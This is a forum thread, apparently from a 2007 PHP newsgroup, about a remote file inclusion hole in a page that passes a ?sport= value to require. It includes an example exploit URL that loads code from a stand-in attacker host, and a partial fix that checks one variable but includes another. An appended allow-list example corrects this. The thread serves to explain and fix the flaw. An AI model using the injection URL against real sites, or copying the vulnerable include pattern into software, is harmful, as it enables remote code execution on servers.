Posted by SA SA on 01/16/07 00:12
Sorry to be ignorant, but should not "P Pulkkinen"'s solution work?
Please advise if I am overlooking something.
The hosting company I am using should plug the hole, but if the code
itself is buggy then I don't blame them.
<-------------
$allowable_sports = array("football", "rugby", "tennis");
if (isset($HTTP_GET_VARS['sport']) &&
    in_array($HTTP_GET_VARS['sport'], $allowable_sports))
{ require ($sport.".php"); }
else
{ require ("error.php"); }
---------------->
Colin McKinnon wrote:
> SA SA wrote:
>
> > Hello,
> > I do not know anything about PHP but was thrown into this mix. I was told
> > by my ISP that there is a vulnerability in the following code that allows
> > a spammer to load an offsite PHP script for mailing.
>
> There are 2 very odd things about this:
>
> 1) that you have an ISP who is willing to take the time to read your code
> (interesting, and a big plus)
>
> 2) that your host is not configured to prevent this (a bit worrying,
> depending on the reason for 1).
>
> To exploit this, someone just has to enter a URL like:
>
> http://www.sasas-site.com/code.php?sport=http%3A%2F%2Fwww.blackhat.net%2Fmalware.src
>
> to get their code into your ISP's webserver.
>
> > How do I fix it?
> >
>
> Do a lot of checking on $_GET['sport'] or restrict it to a specific list of
> values.
>
> C.
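
An added example, not part of either post and not P Pulkkinen's code: the allow-list idea from this thread with the same value being checked and used (the snippet above checks $HTTP_GET_VARS['sport'] but requires $sport, which is only populated when register_globals is on). The helper name resolve_sport_page() and the example.invalid URL are assumptions made for illustration.

```php
<?php
// Added example: allow-list dispatch for the ?sport= parameter.
// The page names (football, rugby, tennis, error.php) come from the post;
// resolve_sport_page() is a hypothetical helper name.

const ALLOWED_SPORTS = ['football', 'rugby', 'tennis'];

/**
 * Return the local file to include for a request, never a path built
 * from unchecked input. $query stands in for $_GET.
 */
function resolve_sport_page(array $query, string $baseDir): string
{
    $sport = $query['sport'] ?? null;

    // Reject arrays (?sport[]=x) and anything not exactly on the list.
    // The third argument makes in_array() compare strictly.
    if (!is_string($sport) || !in_array($sport, ALLOWED_SPORTS, true)) {
        return $baseDir . '/error.php';
    }

    // The value that was checked is the value used to build the path,
    // and the path is anchored to a local directory, so a URL can never
    // reach require.
    return $baseDir . '/' . $sport . '.php';
}

// Constructed sample requests (not taken from real traffic).
$samples = [
    ['sport' => 'rugby'],                         // allowed page
    ['sport' => 'http://example.invalid/x.src'],  // remote URL: rejected
    ['sport' => ['football']],                    // array instead of string
    [],                                           // parameter missing
];

foreach ($samples as $query) {
    echo json_encode($query), ' => ',
         resolve_sport_page($query, __DIR__), PHP_EOL;
}

// In the real page: require resolve_sport_page($_GET, __DIR__);
```

Only the first sample resolves to rugby.php; the other three fall through to error.php.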